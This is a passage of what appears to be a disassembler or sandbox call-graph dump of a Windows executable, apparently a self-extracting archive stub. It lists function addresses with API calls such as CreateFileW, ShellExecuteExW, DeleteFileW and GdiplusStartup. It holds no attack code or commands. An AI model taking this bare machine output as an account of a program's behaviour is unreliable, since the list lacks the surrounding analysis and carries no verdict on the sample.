23538->23531 23539->23538 23540->23536 23542 a23446 try_get_function 5 API calls 23541->23542 23543 a23581 23542->23543 23544 a23599 TlsAlloc 23543->23544 23545 a2358a 23543->23545 23545->23514 23546->23516 23547->23519 23551 a2bae3 23548->23551 23549 a1eefa TranslatorGuardHandler 5 API calls 23550 a1e8a1 23549->23550 23550->23416 23550->23505 23551->23549 23553 a1f2e3 GetStartupInfoW 23552->23553 23553->23430 23555 a2b5a9 23554->23555 23557 a2b5b2 23554->23557 23559 a2b497 23555->23559 23557->23433 23558->23433 23560 a292b5 CallUnexpected 38 API calls 23559->23560 23561 a2b4a4 23560->23561 23579 a2b5be 23561->23579 23563 a2b4ac 23588 a2b22b 23563->23588 23566 a2b4c3 23566->23557 23569 a2b506 23571 a287fe _free 20 API calls 23569->23571 23571->23566 23573 a2b501 23612 a28c7a 20 API calls __dosmaperr 23573->23612 23575 a2b54a 23575->23569 23613 a2b101 26 API calls 23575->23613 23576 a2b51e 23576->23575 23577 a287fe _free 20 API calls 23576->23577 23577->23575 23580 a2b5ca ___DestructExceptionObject 23579->23580 23581 a292b5 CallUnexpected 38 API calls 23580->23581 23583 a2b5d4 23581->23583 23584 a2b658 ___DestructExceptionObject 23583->23584 23587 a287fe _free 20 API calls 23583->23587 23614 a28886 38 API calls _abort 23583->23614 23615 a2a701 EnterCriticalSection 23583->23615 23616 a2b64f LeaveCriticalSection _abort 23583->23616 23584->23563 23587->23583 23589 a240a6 __fassign 38 API calls 23588->23589 23590 a2b23d 23589->23590 23591 a2b25e 23590->23591 23592 a2b24c GetOEMCP 23590->23592 23593 a2b275 23591->23593 23594 a2b263 GetACP 23591->23594 23592->23593 23593->23566 23595 a28838 23593->23595 23594->23593 23596 a28876 23595->23596 23601 a28846 __dosmaperr 23595->23601 23618 a28c7a 20 API calls __dosmaperr 23596->23618 23597 a28861 RtlAllocateHeap 23599 a28874 23597->23599 23597->23601 23599->23569 23602 a2b660 23599->23602 23601->23596 23601->23597 23617 a2749d 7 API calls 2 library calls 23601->23617 23603 a2b22b 40 API calls 23602->23603 23604 a2b67f 23603->23604 23607 a2b6d0 IsValidCodePage 23604->23607 23609 a2b686 23604->23609 23611 a2b6f5 ___scrt_fastfail 23604->23611 23605 a1eefa TranslatorGuardHandler 5 API calls 23606 a2b4f9 23605->23606 23606->23573 23606->23576 23608 a2b6e2 GetCPInfo 23607->23608 23607->23609 23608->23609 23608->23611 23609->23605 23619 a2b303 GetCPInfo 23611->23619 23612->23569 23613->23569 23615->23583 23616->23583 23617->23601 23618->23599 23625 a2b33d 23619->23625 23628 a2b3e7 23619->23628 23622 a1eefa TranslatorGuardHandler 5 API calls 23624 a2b493 23622->23624 23624->23609 23629 a2c3f8 23625->23629 23627 a2a585 __vsnwprintf_l 43 API calls 23627->23628 23628->23622 23630 a240a6 __fassign 38 API calls 23629->23630 23631 a2c418 MultiByteToWideChar 23630->23631 23633 a2c456 23631->23633 23640 a2c4ee 23631->23640 23636 a28838 __onexit 21 API calls 23633->23636 23641 a2c477 __vsnwprintf_l ___scrt_fastfail 23633->23641 23634 a1eefa TranslatorGuardHandler 5 API calls 23637 a2b39e 23634->23637 23635 a2c4e8 23648 a2a5d0 20 API calls _free 23635->23648 23636->23641 23643 a2a585 23637->23643 23639 a2c4bc MultiByteToWideChar 23639->23635 23642 a2c4d8 GetStringTypeW 23639->23642 23640->23634 23641->23635 23641->23639 23642->23635 23644 a240a6 __fassign 38 API calls 23643->23644 23645 a2a598 23644->23645 23649 a2a368 23645->23649 23648->23640 23651 a2a383 __vsnwprintf_l 23649->23651 23650 a2a3a9 MultiByteToWideChar 23652 a2a3d3 23650->23652 23653 a2a55d 23650->23653 23651->23650 23656 a28838 __onexit 21 API calls 23652->23656 23659 a2a3f4 __vsnwprintf_l 23652->23659 23654 a1eefa TranslatorGuardHandler 5 API calls 23653->23654 23655 a2a570 23654->23655 23655->23627 23656->23659 23657 a2a4a9 23685 a2a5d0 20 API calls _free 23657->23685 23658 a2a43d MultiByteToWideChar 23658->23657 23660 a2a456 23658->23660 23659->23657 23659->23658 23676 a2aa3c 23660->23676 23664 a2a480 23664->23657 23666 a2aa3c __vsnwprintf_l 11 API calls 23664->23666 23665 a2a4b8 23668 a28838 __onexit 21 API calls 23665->23668 23671 a2a4d9 __vsnwprintf_l 23665->23671 23666->23657 23667 a2a54e 23684 a2a5d0 20 API calls _free 23667->23684 23668->23671 23669 a2aa3c __vsnwprintf_l 11 API calls 23672 a2a52d 23669->23672 23671->23667 23671->23669 23672->23667 23673 a2a53c WideCharToMultiByte 23672->23673 23673->23667 23674 a2a57c 23673->23674 23686 a2a5d0 20 API calls _free 23674->23686 23687 a2a768 23676->23687 23680 a2aaac LCMapStringW 23681 a2aa6c 23680->23681 23682 a1eefa TranslatorGuardHandler 5 API calls 23681->23682 23683 a2a46d 23682->23683 23683->23657 23683->23664 23683->23665 23684->23657 23685->23653 23686->23657 23688 a2a798 23687->23688 23692 a2a794 23687->23692 23688->23681 23694 a2aac4 10 API calls 3 library calls 23688->23694 23689 a2a7b8 23689->23688 23691 a2a7c4 GetProcAddress 23689->23691 23693 a2a7d4 __crt_fast_encode_pointer 23691->23693 23692->23688 23692->23689 23695 a2a804 23692->23695 23693->23688 23694->23680 23696 a2a825 LoadLibraryExW 23695->23696 23697 a2a81a 23695->23697 23698 a2a842 GetLastError 23696->23698 23699 a2a85a 23696->23699 23697->23692 23698->23699 23700 a2a84d LoadLibraryExW 23698->23700 23699->23697 23701 a2a871 FreeLibrary 23699->23701 23700->23699 23701->23697 23793 a1e630 23702->23793 23705 a103cb GetProcAddress 23708 a103e4 23705->23708 23709 a103fc GetProcAddress 23705->23709 23706 a1042f 23707 a1075f GetModuleFileNameW 23706->23707 23805 a273cd 42 API calls __vsnwprintf_l 23706->23805 23722 a1077e 23707->23722 23708->23709 23709->23706 23710 a1040e 23709->23710 23710->23706 23712 a10699 23712->23707 23713 a106a4 GetModuleFileNameW CreateFileW 23712->23713 23714 a10753 CloseHandle 23713->23714 23715 a106d7 SetFilePointer 23713->23715 23714->23707 23715->23714 23716 a106e7 ReadFile 23715->23716 23716->23714 23719 a10706 23716->23719 23719->23714 23721 a10360 3 API calls 23719->23721 23720 a107ad CompareStringW 23720->23722 23721->23719 23722->23720 23723 a107e3 GetFileAttributesW 23722->23723 23724 a107fb 23722->23724 23795 a0aee5 23722->23795 23798 a10360 23722->23798 23723->23722 23723->23724 23725 a10805 23724->23725 23727 a1083b 23724->23727 23728 a1081d GetFileAttributesW 23725->23728 23729 a10835 23725->23729 23726 a1094a 23750 a1a004 GetCurrentDirectoryW 23726->23750 23727->23726 23730 a0aee5 GetVersionExW 23727->23730 23728->23725 23728->23729 23729->23727 23731 a10855 23730->23731 23732 a108c2 23731->23732 23733 a1085c 23731->23733 23734 a03f8f _swprintf 51 API calls 23732->23734 23735 a10360 3 API calls 23733->23735 23736 a108ea AllocConsole 23734->23736 23737 a10866 23735->23737 23738 a10942 ExitProcess 23736->23738 23739 a108f7 GetCurrentProcessId AttachConsole 23736->23739 23740 a10360 3 API calls 23737->23740 23806 a23883 23739->23806 23742 a10870 23740->23742 23744 a0e0ac 51 API calls 23742->23744 23743 a10918 GetStdHandle WriteConsoleW Sleep FreeConsole 23743->23738 23745 a1088b 23744->23745 23746 a03f8f _swprintf 51 API calls 23745->23746 23747 a1089e 23746->23747 23748 a0e0ac 51 API calls 23747->23748 23749 a108ad 23748->23749 23749->23738 23750->23440 23752 a10360 3 API calls 23751->23752 23753 a1a5da OleInitialize 23752->23753 23754 a1a5fd GdiplusStartup SHGetMalloc 23753->23754 23754->23442 23756 a116ef IsDBCSLeadByte 23755->23756 23756->23756 23757 a11707 23756->23757 23757->23444 23759 a1b0a5 23758->23759 23760 a1b09e 23758->23760 23762 a1b0ab GetObjectW 23759->23762 23763 a1b0ba 23759->23763 23825 a1a07c FindResourceW 23760->23825 23762->23763 23820 a19f7a 23763->23820 23766 a1b110 23777 a0d5dc 23766->23777 23767 a1b0ec 23839 a19fba GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23767->23839 23768 a1a07c 12 API calls 23770 a1b0dd 23768->23770 23770->23767 23772 a1b0e3 DeleteObject 23770->23772 23771 a1b0f4 23840 a19f99 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23771->23840 23772->23767 23774 a1b0fd 23841 a1a1bd 8 API calls ___scrt_fastfail 23774->23841 23776 a1b104 DeleteObject 23776->23766 23852 a0d601 23777->23852 23779 a0d5e8 23892 a0dd29 GetModuleHandleW FindResourceW 23779->23892 23782 a18a75 24020 a1e512 23782->24020 23786 a1a65d GdiplusShutdown OleUninitialize 23785->23786 23786->23482 23788->23451 23789->23467 23790->23446 23791->23474 23792->23480 23794 a103b4 GetModuleHandleW 23793->23794 23794->23705 23794->23706 23796 a0aef9 GetVersionExW 23795->23796 23797 a0af35 23795->23797 23796->23797 23797->23722 23799 a1e630 23798->23799 23800 a1036d GetSystemDirectoryW 23799->23800 23801 a103a3 23800->23801 23802 a10385 23800->23802 23801->23722 23808 a0bb55 23802->23808 23804 a10396 LoadLibraryW 23804->23801 23805->23712 23807 a2388b 23806->23807 23807->23743 23807->23807 23809 a0bb62 23808->23809 23812 a0b9f6 23809->23812 23811 a0bb80 23811->23804 23815 a0ffe4 23812->23815 23816 a0fff4 23815->23816 23817 a0ba04 23815->23817 23819 a11ab5 CharUpperW 23816->23819 23817->23811 23819->23817 23842 a19f99 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23820->23842 23822 a19f81 23823 a19f8d 23822->23823 23843 a19fba GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23822->23843 23823->23766 23823->23767 23823->23768 23826 a1a0d0 23825->23826 23827 a1a09e SizeofResource 23825->23827 23826->23759 23827->23826 23828 a1a0b2 LoadResource 23827->23828 23828->23826 23829 a1a0c3 LockResource 23828->23829 23829->23826 23830 a1a0d7 GlobalAlloc 23829->23830 23830->23826 23831 a1a0f2 GlobalLock 23830->23831 23832 a1a181 GlobalFree 23831->23832 23833 a1a101 __vswprintf_c_l 23831->23833 23832->23826 23834 a1a17a GlobalUnlock 23833->23834 23844 a19fdb GdipAlloc 23833->23844 23834->23832 23837 a1a165 23837->23834 23838 a1a14f GdipCreateHBITMAPFromBitmap 23838->23837 23839->23771 23840->23774 23841->23776 23842->23822 23843->23823 23845 a19fed 23844->23845 23846 a19ffa 23844->23846 23848 a19d6f 23845->23848 23846->23834 23846->23837 23846->23838 23849 a19d90 GdipCreateBitmapFromStreamICM 23848->23849 23850 a19d97 GdipCreateBitmapFromStream 23848->23850 23851 a19d9c 23849->23851 23850->23851 23851->23846 23853 a0d60b __EH_prolog 23852->23853 23854 a0d63a GetModuleFileNameW 23853->23854 23855 a0d66b 23853->23855 23856 a0d654 23854->23856 23894 a09b50 23855->23894 23856->23855 23859 a0d6c7 23905 a25d80 23859->23905 23862 a0dcec 76 API calls 23864 a0d69b 23862->23864 23863 a0d6da 23865 a25d80 26 API calls 23863->23865 23864->23859 23864->23862 23887 a0d8e7 23864->23887 23873 a0d6ec 23865->23873 23866 a0d823 23866->23887 23927 a09ed0 23866->23927 23869 a09d90 80 API calls 23869->23873 23870 a0d83d ___std_exception_copy 23870->23887 23932 a09d90 23870->23932 23872 a09ed0 77 API calls 23872->23873 23873->23866 23873->23869 23873->23872 23873->23887 23919 a09fe0 23873->23919 23874 a0d866 ___std_exception_copy 23874->23887 23889 a0d872 ___std_exception_copy 23874->23889 23955 a11692 MultiByteToWideChar 23874->23955 23876 a0d9eb 23940 a0d13a 23876->23940 23878 a0dcca 23879 a0d13a 76 API calls 23878->23879 23880 a0dcba 23879->23880 23880->23779 23881 a0da31 23882 a25d80 26 API calls 23881->23882 23884 a0da4b 23882->23884 23883 a0dcec 76 API calls 23885 a0da02 23883->23885 23886 a25d80 26 API calls 23884->23886 23885->23881 23885->23883 23886->23887 23948 a097f0 23887->23948 23888 a118ae WideCharToMultiByte 23888->23889 23889->23876 23889->23878 23889->23880 23889->23887 23889->23888 23956 a0e046 50 API calls __vsnprintf 23889->23956 23957 a25bc9 26 API calls 3 library calls 23889->23957 23893 a0d5ef 23892->23893 23893->23782 23895 a09b5a 23894->23895 23896 a09bd9 CreateFileW 23895->23896 23897 a09bf9 GetLastError 23896->23897 23902 a09c4a 23896->23902 23958 a0b85c 23897->23958 23899 a09c67 SetFileTime 23903 a09c81 23899->23903 23900 a09c19 23901 a09c1d CreateFileW GetLastError 23900->23901 23900->23902 23904 a09c41 23901->23904 23902->23899 23902->23903 23903->23864 23904->23902 23906 a25db9 23905->23906 23907 a25dbd 23906->23907 23918 a25de5 23906->23918 23969 a28c7a 20 API calls __dosmaperr 23907->23969 23909 a25dc2 23970 a28b59 26 API calls pre_c_initialization 23909->23970 23910 a26109 23912 a1eefa TranslatorGuardHandler 5 API calls 23910->23912 23914 a26116 23912->23914 23913 a25dcd 23915 a1eefa TranslatorGuardHandler 5 API calls 23913->23915 23914->23863 23916 a25dd9 23915->23916 23916->23863 23918->23910 23971 a25ca0 5 API calls TranslatorGuardHandler 23918->23971 23920 a09ff3 23919->23920 23921 a0a004 SetFilePointer 23919->23921 23923 a0a03d 23920->23923 23972 a06f92 75 API calls 23920->23972 23922 a0a022 GetLastError 23921->23922 23921->23923 23922->23923 23925 a0a02c 23922->23925 23923->23873 23925->23923 23973 a06f92 75 API calls 23925->23973 23974 a09cf9 23927->23974 23930 a09efb 23930->23870 23934 a09d9c 23932->23934 23936 a09da3 23932->23936 23934->23874 23935 a09e3e 23935->23934 23992 a06f51 75 API calls 23935->23992 23936->23934 23936->23935 23938 a09e60 23936->23938 23980 a099ee 23936->23980 23938->23934 23939 a099ee 5 API calls 23938->23939 23939->23938 23941 a0d1c5 23940->23941 23942 a0d14d 23940->23942 23941->23885 23997 a2874e 26 API calls 2 library calls 23942->23997 23945 a0d159 23998 a273f7 26 API calls 2 library calls 23945->23998 23946 a0d1b0 23999 a0dd07 76 API calls 23946->23999 23949 a09814 23948->23949 23954 a09825 23948->23954 23950 a09820 23949->23950 23951 a09827 23949->23951 23949->23954 24000 a099b7 23950->24000 24005 a09870 23951->24005 23954->23779 23955->23889 23956->23889 23957->23889 23959 a0b869 23958->23959 23960 a0b9f6 CharUpperW 23959->23960 23967 a0b873 23959->23967 23961 a0b882 23960->23961 23968 a0ba22 CharUpperW 23961->23968 23963 a0b891 23964 a0b895 23963->23964 23965 a0b90c GetCurrentDirectoryW 23963->23965 23966 a0b9f6 CharUpperW 23964->23966 23965->23967 23966->23967 23967->23900 23968->23963 23969->23909 23970->23913 23971->23918 23972->23921 23973->23923 23975 a09d77 23974->23975 23978 a09d03 23974->23978 23975->23930 23979 a06f92 75 API calls 23975->23979 23976 a09d4d SetFilePointer 23976->23975 23977 a09d6d GetLastError 23976->23977 23977->23975 23978->23976 23979->23930 23981 a09a07 ReadFile 23980->23981 23982 a099fc GetStdHandle 23980->23982 23983 a09a20 23981->23983 23984 a09a40 23981->23984 23982->23981 23993 a09b29 23983->23993 23984->23936 23986 a09a27 23987 a09a35 23986->23987 23988 a09a57 23986->23988 23989 a09a48 GetLastError 23986->23989 23991 a099ee GetFileType 23987->23991 23988->23984 23990 a09a67 GetLastError 23988->23990 23989->23984 23989->23988 23990->23984 23990->23987 23991->23984 23992->23934 23994 a09b32 GetFileType 23993->23994 23995 a09b2f 23993->23995 23996 a09b40 23994->23996 23995->23986 23996->23986 23997->23945 23998->23946 23999->23941 24001 a099c0 24000->24001 24002 a099c4 24000->24002 24001->23954 24002->24001 24011 a0a320 24002->24011 24007 a0987c 24005->24007 24008 a0989a 24005->24008 24006 a098b9 24006->23954 24007->24008 24009 a09888 FindCloseChangeNotification 24007->24009 24008->24006 24019 a06e07 74 API calls 24008->24019 24009->24008 24012 a1e630 24011->24012 24013 a0a32d DeleteFileW 24012->24013 24014 a0a340 24013->24014 24015 a099ec 24013->24015 24016 a0b85c 2 API calls 24014->24016 24015->23954 24017 a0a354 24016->24017 24017->24015 24018 a0a358 DeleteFileW 24017->24018 24018->24015 24019->24006 24022 a1e517 ___std_exception_copy 24020->24022 24021 a18a94 24021->23466 24022->24021 24026 a2749d 7 API calls 2 library calls 24022->24026 24027 a1ef7e RaiseException __CxxThrowException@8 new 24022->24027 24028 a1ef61 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 24022->24028 24026->24022 24030 a27701 CallUnexpected 24029->24030 24031 a27719 24030->24031 24033 a2784f _abort GetModuleHandleW 24030->24033 24051 a2a701 EnterCriticalSection 24031->24051 24034 a2770d 24033->24034 24034->24031 24063 a27893 GetModuleHandleExW 24034->24063 24035 a277bf 24052 a277ff 24035->24052 24038 a27721 24038->24035 24040 a27796 24038->24040 24071 a2821f 20 API calls _abort 24038->24071 24041 a277ae 24040->24041 24045 a28511 _abort 5 API calls 24040->24045 24046 a28511 _abort 5 API calls 24041->24046 24042 a27808 24072 a31ce9 5 API calls TranslatorGuardHandler 24042->24072 24043 a277dc 24055 a2780e 24043->24055 24045->24041 24046->24035 24051->24038 24073 a2a751 LeaveCriticalSection 24052->24073 24054 a277d8 24054->24042 24054->24043 24074 a2ab46 24055->24074 24058 a2783c 24061 a27893 _abort 8 API calls 24058->24061 24059 a2781c GetPEB 24059->24058 24060 a2782c GetCurrentProcess TerminateProcess 24059->24060 24060->24058 24062 a27844 ExitProcess 24061->24062 24064 a278e0 24063->24064 24065 a278bd GetProcAddress 24063->24065 24067 a278e6 FreeLibrary 24064->24067 24068 a278ef 24064->24068 24066 a278d2 24065->24066 24066->24064 24067->24068 24069 a1eefa TranslatorGuardHandler 5 API calls 24068->24069 24070 a278f9 24069->24070 24070->24031 24071->24040 24073->24054 24075 a2ab61 24074->24075 24076 a2ab6b 24074->24076 24078 a1eefa TranslatorGuardHandler 5 API calls 24075->24078 24077 a2a768 __dosmaperr 5 API calls 24076->24077 24077->24075 24079 a27818 24078->24079 24079->24058 24079->24059 25170 a27c88 55 API calls _free 25208 a2798e 52 API calls 2 library calls 25171 a06090 81 API calls 25172 a2ee91 21 API calls __vsnwprintf_l 24092 a1c69e 24093 a1c757 24092->24093 24100 a1c6bc 24092->24100 24094 a1c775 24093->24094 24106 a1c0d9 _wcsrchr 24093->24106 24145 a1d0df 24093->24145 24097 a1d0df 18 API calls 24094->24097 24094->24106 24097->24106 24098 a1cd51 24100->24093 24101 a11ac4 CompareStringW 24100->24101 24101->24100 24102 a1c3ad SetWindowTextW 24102->24106 24105 a0bb55 CharUpperW 24105->24106 24106->24098 24106->24102 24106->24105 24109 a1c19b SetFileAttributesW 24106->24109 24114 a1c577 GetDlgItem SetWindowTextW SendMessageW 24106->24114 24118 a1c5b7 SendMessageW 24106->24118 24122 a11ac4 CompareStringW 24106->24122 24123 a1acc6 24106->24123 24127 a1a004 GetCurrentDirectoryW 24106->24127 24129 a0a71d 7 API calls 24106->24129 24130 a0a6a6 FindClose 24106->24130 24131 a1ae2a 74 API calls ___std_exception_copy 24106->24131 24132 a238ae 24106->24132 24111 a1c255 GetFileAttributesW 24109->24111 24121 a1c1b5 ___scrt_fastfail 24109->24121 24111->24106 24113 a1c267 DeleteFileW 24111->24113 24113->24106 24115 a1c278 24113->24115 24114->24106 24116 a03f8f _swprintf 51 API calls 24115->24116 24117 a1c298 GetFileAttributesW 24116->24117 24117->24115 24119 a1c2ad MoveFileW 24117->24119 24118->24106 24119->24106 24120 a1c2c5 MoveFileExW 24119->24120 24120->24106 24121->24106 24121->24111 24128 a0b6e7 52 API calls _swprintf 24121->24128 24122->24106 24124 a1acd0 24123->24124 24125 a1ad83 ExpandEnvironmentStringsW 24124->24125 24126 a1ada6 24124->24126 24125->24126 24126->24106 24127->24106 24128->24121 24129->24106 24130->24106 24131->24106 24133 a28926 24132->24133 24134 a28933 24133->24134 24135 a2893e 24133->24135 24136 a28838 __onexit 21 API calls 24134->24136 24137 a28946 24135->24137 24143 a2894f __dosmaperr 24135->24143 24142 a2893b 24136->24142 24140 a287fe _free 20 API calls 24137->24140 24138 a28954 24168 a28c7a 20 API calls __dosmaperr 24138->24168 24139 a28979 HeapReAlloc 24139->24142 24139->24143 24140->24142 24142->24106 24143->24138 24143->24139 24169 a2749d 7 API calls 2 library calls 24143->24169 24148 a1d0e9 ___scrt_fastfail 24145->24148 24146 a1d347 24146->24094 24147 a1d1d8 24170 a0a373 24147->24170 24148->24146 24148->24147 24173 a11ac4 CompareStringW 24148->24173 24152 a1d20c ShellExecuteExW 24152->24146 24159 a1d21f 24152->24159 24154 a1d204 24154->24152 24155 a1d258 24175 a1d5a3 6 API calls 24155->24175 24156 a1d2ae CloseHandle 24157 a1d2c7 24156->24157 24158 a1d2bc 24156->24158 24157->24146 24164 a1d33e ShowWindow 24157->24164 24176 a11ac4 CompareStringW 24158->24176 24159->24155 24159->24156 24161 a1d24e ShowWindow 24159->24161 24161->24155 24163 a1d270 24163->24156 24165 a1d283 GetExitCodeProcess 24163->24165 24164->24146 24165->24156 24166 a1d296 24165->24166 24166->24156 24168->24142 24169->24143 24177 a0a387 24170->24177 24173->24147 24174 a0b429 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24174->24154 24175->24163 24176->24157 24178 a1e630 24177->24178 24179 a0a394 GetFileAttributesW 24178->24179 24180 a0a3a5 24179->24180 24181 a0a37c 24179->24181 24182 a0b85c 2 API calls 24180->24182 24181->24152 24181->24174 24183 a0a3b9 24182->24183 24183->24181 24184 a0a3bd GetFileAttributesW 24183->24184 24184->24181 25175 a11cf0 26 API calls std::bad_exception::bad_exception 25176 a1eef0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25212 a19df0 GdipCloneImage GdipAlloc 25177 a232f0 5 API calls 2 library calls 25082 a1e4c1 25083 a1e4cb 25082->25083 25084 a1e221 ___delayLoadHelper2@8 19 API calls 25083->25084 25085 a1e4d8 25084->25085 25178 a1a6c0 71 API calls 25088 a2a6c0 25089 a2a6cb 25088->25089 25091 a2a6f4 25089->25091 25092 a2a6f0 25089->25092 25094 a2a9da 25089->25094 25101 a2a720 DeleteCriticalSection 25091->25101 25095 a2a768 __dosmaperr 5 API calls 25094->25095 25096 a2aa01 25095->25096 25097 a2aa1f InitializeCriticalSectionAndSpinCount 25096->25097 25098 a2aa0a 25096->25098 25097->25098 25099 a1eefa TranslatorGuardHandler 5 API calls 25098->25099 25100 a2aa36 25099->25100 25100->25089 25101->25092 25103 a293c0 25111 a2a87f 25103->25111 25107 a293dc 25108 a293e9 25107->25108 25119 a293f0 11 API calls 25107->25119 25110 a293d4 25112 a2a768 __dosmaperr 5 API calls 25111->25112 25113 a2a8a6 25112->25113 25114 a2a8be TlsAlloc 25113->25114 25115 a2a8af 25113->25115 25114->25115 25116 a1eefa TranslatorGuardHandler 5 API calls 25115->25116 25117 a293ca 25116->25117 25117->25110 25118 a29339 20 API calls 2 library calls 25117->25118 25118->25107 25119->25110 25217 a1c0d9 101 API calls 3 library calls 25126 a0a0cf 25127 a0a0e4 25126->25127 25128 a0a0dd 25126->25128 25129 a0a0ea GetStdHandle 25127->25129 25136 a0a0f5 25127->25136 25129->25136 25130 a0a149 WriteFile 25130->25136 25131 a0a11a 25132 a0a11c WriteFile 25131->25132 25131->25136 25132->25131 25132->25136 25134 a0a1d1 25138 a070d6 75 API calls 25134->25138 25136->25128 25136->25130 25136->25131 25136->25132 25136->25134 25137 a06ddc 76 API calls 25136->25137 25137->25136 25138->25128 25180 a016d0 84 API calls 25219 a1c0d9 96 API calls 3 library calls 25181 a172d0 115 API calls 25220 a2a1d0 21 API calls 25222 a1ddd2 19 API calls ___delayLoadHelper2@8 25141 a010d5 25146 a05b57 25141->25146 25147 a05b61 __EH_prolog 25146->25147 25148 a0b26d 83 API calls 25147->25148 25149 a05b6d 25148->25149 25153 a05d4c GetCurrentProcess GetProcessAffinityMask 25149->25153 25182 a1ac20 98 API calls 25183 a19a20 10 API calls 25223 a18f20 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 23179 a1df24 23180 a1def5 23179->23180 23182 a1e221 23180->23182 23210 a1df2e 23182->23210 23184 a1e23b 23185 a1e298 23184->23185 23196 a1e2bc 23184->23196 23186 a1e19f DloadReleaseSectionWriteAccess 11 API calls 23185->23186 23187 a1e2a3 RaiseException 23186->23187 23204 a1e491 23187->23204 23188 a1e3a7 23195 a1e405 GetProcAddress 23188->23195 23203 a1e463 23188->23203 23189 a1e334 LoadLibraryExA 23191 a1e395 23189->23191 23192 a1e347 GetLastError 23189->23192 23191->23188 23197 a1e3a0 FreeLibrary 23191->23197 23194 a1e370 23192->23194 23206 a1e35a 23192->23206 23193 a1e4a0 23193->23180 23198 a1e19f DloadReleaseSectionWriteAccess 11 API calls 23194->23198 23199 a1e415 GetLastError 23195->23199 23195->23203 23196->23188 23196->23189 23196->23191 23196->23203 23197->23188 23200 a1e37b RaiseException 23198->23200 23207 a1e428 23199->23207 23200->23204 23202 a1e19f DloadReleaseSectionWriteAccess 11 API calls 23205 a1e449 RaiseException 23202->23205 23221 a1e19f 23203->23221 23229 a1eefa 23204->23229 23208 a1df2e ___delayLoadHelper2@8 11 API calls 23205->23208 23206->23191 23206->23194 23207->23202 23207->23203 23209 a1e460 23208->23209 23209->23203 23211 a1df60 23210->23211 23212 a1df3a 23210->23212 23211->23184 23236 a1dfdd 23212->23236 23215 a1df5b 23246 a1df61 23215->23246 23218 a1eefa TranslatorGuardHandler 5 API calls 23219 a1e21d 23218->23219 23219->23184 23220 a1e1ec 23220->23218 23222 a1e1b1 23221->23222 23223 a1e1d3 23221->23223 23224 a1dfdd DloadLock 8 API calls 23222->23224 23223->23204 23225 a1e1b6 23224->23225 23226 a1e1ce 23225->23226 23228 a1e12f DloadProtectSection 3 API calls 23225->23228 23255 a1e1d7 8 API calls 2 library calls 23226->23255 23228->23226 23230 a1ef03 23229->23230 23231 a1ef05 IsProcessorFeaturePresent 23229->23231 23230->23193 23233 a1f507 23231->23233 23256 a1f4cb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23233->23256 23235 a1f5ea 23235->23193 23237 a1df61 DloadUnlock 3 API calls 23236->23237 23238 a1dff2 23237->23238 23239 a1eefa TranslatorGuardHandler 5 API calls 23238->23239 23240 a1df3f 23239->23240 23240->23215 23241 a1e12f 23240->23241 23243 a1e144 DloadObtainSection 23241->23243 23242 a1e17f VirtualProtect 23244 a1e14a 23242->23244 23243->23242 23243->23244 23254 a1e03a VirtualQuery GetSystemInfo 23243->23254 23244->23215 23247 a1df72 23246->23247 23248 a1df6e 23246->23248 23249 a1df76 23247->23249 23250 a1df7a GetModuleHandleW 23247->23250 23248->23220 23249->23220 23251 a1df90 GetProcAddress 23250->23251 23253 a1df8c 23250->23253 23252 a1dfa0 GetProcAddress 23251->23252 23251->23253 23252->23253 23253->23220 23254->23242 23255->23223 23256->23235 25185 a01025 29 API calls pre_c_initialization 25224 a01f25 125 API calls __EH_prolog 25186 a2ac28 27 API calls 2 library calls 25225 a1ab2d 76 API calls 23263 a1d830 23264 a1d83d 23263->23264 23271 a0e0ac 23264->23271 23282 a0e0da 23271->23282 23274 a03f8f 23307 a03f62 23274->23307 23277 a1af04 PeekMessageW 23278 a1af58 23277->23278 23279 a1af1f GetMessageW 23277->23279 23280 a1af35 IsDialogMessageW 23279->23280 23281 a1af44 TranslateMessage DispatchMessageW 23279->23281 23280->23278 23280->23281 23281->23278 23285 a0d54a 23282->23285 23290 a0d483 23285->23290 23287 a0d567 23288 a0d57c 23287->23288 23298 a0d588 23287->23298 23288->23274 23291 a0d49e 23290->23291 23297 a0d497 _strncpy 23290->23297 23293 a0d4c2 23291->23293 23302 a118ae WideCharToMultiByte 23291->23302 23296 a0d4f3 23293->23296 23304 a0e046 50 API calls __vsnprintf 23293->23304 23305 a25bc9 26 API calls 3 library calls 23296->23305 23297->23287 23299 a0d59b 23298->23299 23301 a0d597 23298->23301 23306 a25bc9 26 API calls 3 library calls 23299->23306 23301->23288 23303 a118db 23302->23303 23303->23293 23304->23296 23305->23297 23306->23301 23308 a03f79 __vsnwprintf_l 23307->23308 23311 a25a44 23308->23311 23314 a23b07 23311->23314 23315 a23b47 23314->23315 23316 a23b2f 23314->23316 23315->23316 23318 a23b4f 23315->23318 23331 a28c7a 20 API calls __dosmaperr 23316->23331 23333 a240a6 23318->23333 23320 a23b34 23332 a28b59 26 API calls pre_c_initialization 23320->23332 23324 a1eefa TranslatorGuardHandler 5 API calls 23326 a03f83 SetDlgItemTextW 23324->23326 23325 a23bd7 23342 a24456 51 API calls 3 library calls 23325->23342 23326->23277 23329 a23be2 23343 a24129 20 API calls _free 23329->23343 23330 a23b3f 23330->23324 23331->23320 23332->23330 23334 a240c3 23333->23334 23340 a23b5f 23333->23340 23334->23340 23344 a292b5 GetLastError 23334->23344 23336 a240e4 23365 a2940a 38 API calls __fassign 23336->23365 23338 a240fd 23366 a29437 38 API calls __fassign 23338->23366 23341 a24071 20 API calls 2 library calls 23340->23341 23341->23325 23342->23329 23343->23330 23345 a292d7 23344->23345 23346 a292cb 23344->23346 23368 a288c9 20 API calls 3 library calls 23345->23368 23367 a2a92b 11 API calls 2 library calls 23346->23367 23349 a292d1 23349->23345 23351 a29320 SetLastError 23349->23351 23350 a292e3 23352 a292eb 23350->23352 23375 a2a981 11 API calls 2 library calls 23350->23375 23351->23336 23369 a287fe 23352->23369 23355 a29300 23355->23352 23356 a29307 23355->23356 23376 a2911b 20 API calls __dosmaperr 23356->23376 23357 a292f1 23359 a2932c SetLastError 23357->23359 23377 a28886 38 API calls _abort 23359->23377 23360 a29312 23362 a287fe _free 20 API calls 